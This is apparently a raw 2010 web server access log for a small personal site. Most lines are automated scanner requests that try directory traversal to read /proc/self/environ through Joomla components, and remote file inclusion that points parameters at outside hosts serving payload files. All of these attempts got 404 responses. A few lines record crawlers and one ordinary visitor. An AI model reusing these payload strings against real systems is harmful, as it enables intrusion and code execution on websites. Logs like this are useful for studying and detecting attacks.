208.180.27.50 - - [27/Jun/2010:04:18:26 -0500] "GET /index.php?option=com_ccnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.834"
208.180.27.50 - - [27/Jun/2010:04:18:26 -0500] "GET /logs/index.php?option=com_ccnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.834"
67.195.112.180 - - [27/Jun/2010:04:18:32 -0500] "GET /logs/access_log.1177804800 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
219.117.255.170 - - [27/Jun/2010:04:19:30 -0500] "GET /logs/access_log.1274572800/index.php?option=com_mtfireeagle&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.805"
219.117.255.170 - - [27/Jun/2010:04:19:30 -0500] "GET /index.php?option=com_mtfireeagle&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
208.180.27.50 - - [27/Jun/2010:04:19:31 -0500] "GET /logs/access_log.1276732800/index.php?option=com_ccnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.834"
219.117.255.170 - - [27/Jun/2010:04:19:31 -0500] "GET /logs/index.php?option=com_mtfireeagle&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
219.117.255.170 - - [27/Jun/2010:04:20:19 -0500] "GET /logs/access_log.1274832000/index.php?option=com_mtfireeagle&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.805"
219.117.255.170 - - [27/Jun/2010:04:20:47 -0500] "GET /logs/access_log.1274572800/index.php?option=com_mtfireeagle&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.805"
219.117.255.170 - - [27/Jun/2010:04:20:48 -0500] "GET /index.php?option=com_mtfireeagle&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
219.117.255.170 - - [27/Jun/2010:04:20:48 -0500] "GET /logs/index.php?option=com_mtfireeagle&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
219.117.255.170 - - [27/Jun/2010:04:21:36 -0500] "GET /logs/access_log.1274832000/index.php?option=com_mtfireeagle&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.805"
195.56.55.217 - - [27/Jun/2010:04:24:36 -0500] "GET /logs/access_log.1266710400//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.jinyoung-tsm.com/rgboard/data/idomila.txt? HTTP/1.1" 404 348 "-""libwww-perl/5.805"
195.56.55.217 - - [27/Jun/2010:04:24:36 -0500] "GET //ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.jinyoung-tsm.com/rgboard/data/idomila.txt? HTTP/1.1" 404 321 "-""libwww-perl/5.805"
195.56.55.217 - - [27/Jun/2010:04:24:36 -0500] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.jinyoung-tsm.com/rgboard/data/idomila.txt? HTTP/1.1" 404 326 "-""libwww-perl/5.805"
122.201.73.37 - - [27/Jun/2010:04:24:58 -0500] "GET ///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.tramoregolfclub.com//language/_vti_pvt/.%20%20/.bash/id1.txt? HTTP/1.1" 404 336 "-""libwww-perl/5.833"
216.180.240.110 - - [27/Jun/2010:04:25:24 -0500] "GET /logs/access_log.1276473600//index.php?option=com_properties&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.831"
216.180.240.110 - - [27/Jun/2010:04:25:24 -0500] "GET //index.php?option=com_properties&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.831"
216.180.240.110 - - [27/Jun/2010:04:25:24 -0500] "GET /logs//index.php?option=com_properties&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.831"
216.180.240.110 - - [27/Jun/2010:04:25:41 -0500] "GET /logs/access_log.1276473600//index.php?option=com_properties&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.831"
216.180.240.110 - - [27/Jun/2010:04:25:42 -0500] "GET //index.php?option=com_properties&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.831"
216.180.240.110 - - [27/Jun/2010:04:25:42 -0500] "GET /logs//index.php?option=com_properties&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.831"
216.180.240.110 - - [27/Jun/2010:04:27:33 -0500] "GET /logs/access_log.1276473600//index.php?option=com_properties&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.831"
216.180.240.110 - - [27/Jun/2010:04:27:33 -0500] "GET /logs/access_log.1276473600//index.php?option=com_properties&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.831"
216.180.240.110 - - [27/Jun/2010:04:27:33 -0500] "GET //index.php?option=com_properties&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.831"
216.180.240.110 - - [27/Jun/2010:04:27:33 -0500] "GET //index.php?option=com_properties&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.831"
216.180.240.110 - - [27/Jun/2010:04:27:33 -0500] "GET /logs//index.php?option=com_properties&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.831"
216.180.240.110 - - [27/Jun/2010:04:27:34 -0500] "GET /logs//index.php?option=com_properties&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.831"
89.111.176.149 - - [27/Jun/2010:04:28:04 -0500] "GET /logs/access_log.1276473600//index.php?option=com_properties&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.810"
216.180.240.110 - - [27/Jun/2010:04:28:04 -0500] "GET //index.php?option=com_properties&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.831"
89.111.176.149 - - [27/Jun/2010:04:28:04 -0500] "GET //index.php?option=com_properties&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
89.111.176.149 - - [27/Jun/2010:04:28:04 -0500] "GET /logs//index.php?option=com_properties&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.810"
89.111.176.149 - - [27/Jun/2010:04:28:14 -0500] "GET //index.php?option=com_properties&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
216.180.240.110 - - [27/Jun/2010:04:28:20 -0500] "GET //index.php?option=com_properties&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.831"
89.111.176.149 - - [27/Jun/2010:04:28:40 -0500] "GET /logs/access_log.1276473600//index.php?option=com_properties&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.810"
89.111.176.149 - - [27/Jun/2010:04:28:40 -0500] "GET //index.php?option=com_properties&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
89.111.176.149 - - [27/Jun/2010:04:28:40 -0500] "GET /logs//index.php?option=com_properties&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.810"
216.180.240.110 - - [27/Jun/2010:04:33:25 -0500] "GET /logs/access_log.1276473600//index.php?option=com_properties&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.831"
216.180.240.110 - - [27/Jun/2010:04:33:25 -0500] "GET //index.php?option=com_properties&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.831"
216.180.240.110 - - [27/Jun/2010:04:33:25 -0500] "GET /logs//index.php?option=com_properties&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.831"
89.111.176.149 - - [27/Jun/2010:04:34:18 -0500] "GET /logs/access_log.1276473600//index.php?option=com_properties&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.810"
89.111.176.149 - - [27/Jun/2010:04:34:19 -0500] "GET //index.php?option=com_properties&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
89.111.176.149 - - [27/Jun/2010:04:34:19 -0500] "GET /logs//index.php?option=com_properties&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.810"
216.180.240.110 - - [27/Jun/2010:04:34:47 -0500] "GET /logs/access_log.1276473600//index.php?option=com_properties&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.831"
216.180.240.110 - - [27/Jun/2010:04:34:48 -0500] "GET //index.php?option=com_properties&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.831"
216.180.240.110 - - [27/Jun/2010:04:34:48 -0500] "GET /logs//index.php?option=com_properties&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.831"
121.78.118.123 - - [27/Jun/2010:04:35:55 -0500] "GET /logs/access_log.1274572800/index.php?option=com_ccnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.805"
121.78.118.123 - - [27/Jun/2010:04:35:56 -0500] "GET /index.php?option=com_ccnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
121.78.118.123 - - [27/Jun/2010:04:35:57 -0500] "GET /logs/index.php?option=com_ccnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
62.182.63.49 - - [27/Jun/2010:04:36:39 -0500] "GET /logs/access_log.1276473600/index.php?option=com_ccnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.805"
62.182.63.49 - - [27/Jun/2010:04:36:39 -0500] "GET /index.php?option=com_ccnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
62.182.63.49 - - [27/Jun/2010:04:36:39 -0500] "GET /logs/index.php?option=com_ccnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
207.191.229.96 - - [27/Jun/2010:04:38:55 -0500] "GET //index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.831"
64.150.189.35 - - [27/Jun/2010:04:39:10 -0500] "GET //theme/phpAutoVideo/LightTwoOh/sidebar.php?loadpage=http://www.dyesscreek.com/famtree/documents/ID-RFI.txt?? HTTP/1.1" 404 326 "-""libwww-perl/5.805"
121.78.118.123 - - [27/Jun/2010:04:40:07 -0500] "GET /logs/access_log.1275868800/index.php?option=com_ccnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.805"
119.63.198.34 - - [27/Jun/2010:04:40:37 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""Baiduspider+(+http://www.baidu.com/search/spider.htm)"
87.253.135.181 - - [27/Jun/2010:04:42:31 -0500] "GET //index2.php?option=com_ccnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-""libwww-perl/5.805"
87.253.135.181 - - [27/Jun/2010:04:43:24 -0500] "GET //index.php?option=com_ccnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
200.202.243.41 - - [27/Jun/2010:04:44:05 -0500] "GET //index2.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-""libwww-perl/5.813"
87.253.135.181 - - [27/Jun/2010:04:44:36 -0500] "GET //index2.php?option=com_ccnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-""libwww-perl/5.805"
211.206.120.196 - - [27/Jun/2010:04:45:55 -0500] "GET ////write_update.php?board_skin_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 303 "-""libwww-perl/5.79"
200.202.243.41 - - [27/Jun/2010:04:45:58 -0500] "GET //index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.813"
200.202.243.41 - - [27/Jun/2010:04:47:29 -0500] "GET /logs/access_log.1275696000//index2.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 322 "-""libwww-perl/5.813"
200.202.243.41 - - [27/Jun/2010:04:47:30 -0500] "GET //index2.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-""libwww-perl/5.813"
200.202.243.41 - - [27/Jun/2010:04:47:31 -0500] "GET /logs//index2.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-""libwww-perl/5.813"
200.202.243.41 - - [27/Jun/2010:04:48:18 -0500] "GET //index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.813"
200.202.243.41 - - [27/Jun/2010:04:48:24 -0500] "GET //index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.813"
110.11.20.41 - - [27/Jun/2010:04:49:13 -0500] "GET /logs/access_log.1266710400///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.tramoregolfclub.com//language/_vti_pvt/.%20%20/.bash/id1.txt? HTTP/1.1" 404 363 "-""libwww-perl/5.79"
110.11.20.41 - - [27/Jun/2010:04:49:14 -0500] "GET ///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.tramoregolfclub.com//language/_vti_pvt/.%20%20/.bash/id1.txt? HTTP/1.1" 404 336 "-""libwww-perl/5.79"
110.11.20.41 - - [27/Jun/2010:04:49:15 -0500] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.tramoregolfclub.com//language/_vti_pvt/.%20%20/.bash/id1.txt? HTTP/1.1" 404 341 "-""libwww-perl/5.79"
189.108.172.26 - - [27/Jun/2010:04:50:02 -0500] "GET /logs/access_log.1276732800//index.php?option=com_letterman&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.808"
189.108.172.26 - - [27/Jun/2010:04:50:02 -0500] "GET //index.php?option=com_letterman&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.808"
189.108.172.26 - - [27/Jun/2010:04:50:03 -0500] "GET /logs//index.php?option=com_letterman&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.808"
189.108.172.26 - - [27/Jun/2010:04:50:14 -0500] "GET /logs/access_log.1276732800//index.php?option=com_letterman&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.808"
189.108.172.26 - - [27/Jun/2010:04:50:14 -0500] "GET /logs/access_log.1276732800//index.php?option=com_letterman&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.808"
189.108.172.26 - - [27/Jun/2010:04:50:14 -0500] "GET //index.php?option=com_letterman&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.808"
189.108.172.26 - - [27/Jun/2010:04:50:14 -0500] "GET //index.php?option=com_letterman&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.808"
189.108.172.26 - - [27/Jun/2010:04:50:15 -0500] "GET /logs//index.php?option=com_letterman&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.808"
189.108.172.26 - - [27/Jun/2010:04:50:15 -0500] "GET /logs//index.php?option=com_letterman&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.808"
200.202.243.41 - - [27/Jun/2010:04:50:38 -0500] "GET //index2.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-""libwww-perl/5.813"
200.202.243.41 - - [27/Jun/2010:04:50:47 -0500] "GET //index2.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-""libwww-perl/5.813"
200.202.243.41 - - [27/Jun/2010:04:51:08 -0500] "GET //index2.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-""libwww-perl/5.813"
200.175.239.226 - - [27/Jun/2010:04:51:17 -0500] "GET //theme/phpAutoVideo/LightTwoOh/sidebar.php?loadpage=http://www.dyesscreek.com/famtree/documents/ID-RFI.txt?? HTTP/1.1" 404 326 "-""libwww-perl/5.805"
189.108.172.26 - - [27/Jun/2010:04:51:21 -0500] "GET /logs/access_log.1276041600//index.php?option=com_letterman&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.808"
189.108.172.26 - - [27/Jun/2010:04:51:33 -0500] "GET /logs/access_log.1276041600//index.php?option=com_letterman&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.808"
189.108.172.26 - - [27/Jun/2010:04:51:54 -0500] "GET /logs/access_log.1276041600//index.php?option=com_letterman&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.808"
207.46.199.183 - - [27/Jun/2010:04:53:54 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
64.150.189.35 - - [27/Jun/2010:04:54:39 -0500] "GET /logs/access_log.1276732800//theme/phpAutoVideo/LightTwoOh/sidebar.php?loadpage=http://www.dyesscreek.com/famtree/documents/ID-RFI.txt?? HTTP/1.1" 404 353 "-""libwww-perl/5.805"
64.150.189.35 - - [27/Jun/2010:04:54:39 -0500] "GET //theme/phpAutoVideo/LightTwoOh/sidebar.php?loadpage=http://www.dyesscreek.com/famtree/documents/ID-RFI.txt?? HTTP/1.1" 404 326 "-""libwww-perl/5.805"
64.150.189.35 - - [27/Jun/2010:04:54:39 -0500] "GET /logs//theme/phpAutoVideo/LightTwoOh/sidebar.php?loadpage=http://www.dyesscreek.com/famtree/documents/ID-RFI.txt?? HTTP/1.1" 404 331 "-""libwww-perl/5.805"
87.253.135.181 - - [27/Jun/2010:04:55:34 -0500] "GET /logs/access_log.1276041600//index2.php?option=com_ccnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 322 "-""libwww-perl/5.805"
87.253.135.181 - - [27/Jun/2010:04:55:34 -0500] "GET //index2.php?option=com_ccnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-""libwww-perl/5.805"
87.253.135.181 - - [27/Jun/2010:04:55:35 -0500] "GET /logs//index2.php?option=com_ccnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-""libwww-perl/5.805"
207.46.199.55 - - [27/Jun/2010:04:55:53 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
87.253.135.181 - - [27/Jun/2010:04:56:35 -0500] "GET /logs/access_log.1276732800//index2.php?option=com_ccnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 322 "-""libwww-perl/5.805"
207.46.199.55 - - [27/Jun/2010:04:56:40 -0500] "GET /logs/access_log.1212537600 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
27.248.26.128 - - [27/Jun/2010:04:57:04 -0500] "GET /costume/costume1.htm HTTP/1.1" 200 2651 "http://www.google.co.in/search?hl=en&source=hp&q=different+costumes+in+Nations&meta=&aq=f&aqi=&aql=&oq=&gs_rfai=""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)"
27.248.26.128 - - [27/Jun/2010:04:57:09 -0500] "GET /costume/enter1.gif HTTP/1.1" 200 22826 "http://tomdolan.pconline.com/costume/costume1.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)"
62.182.63.49 - - [27/Jun/2010:04:57:20 -0500] "GET /logs/access_log.1274054400/index.php?option=com_ccnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.805"
62.182.63.49 - - [27/Jun/2010:04:57:21 -0500] "GET /index.php?option=com_ccnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
62.182.63.49 - - [27/Jun/2010:04:57:21 -0500] "GET /logs/index.php?option=com_ccnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
27.248.26.128 - - [27/Jun/2010:04:57:34 -0500] "GET /costume/costm_a.JPG HTTP/1.1" 200 32768 "http://tomdolan.pconline.com/costume/costume1.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)"
27.248.26.128 - - [27/Jun/2010:04:57:35 -0500] "GET /costume/costume2.htm HTTP/1.1" 200 1799 "http://tomdolan.pconline.com/costume/costume1.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)"
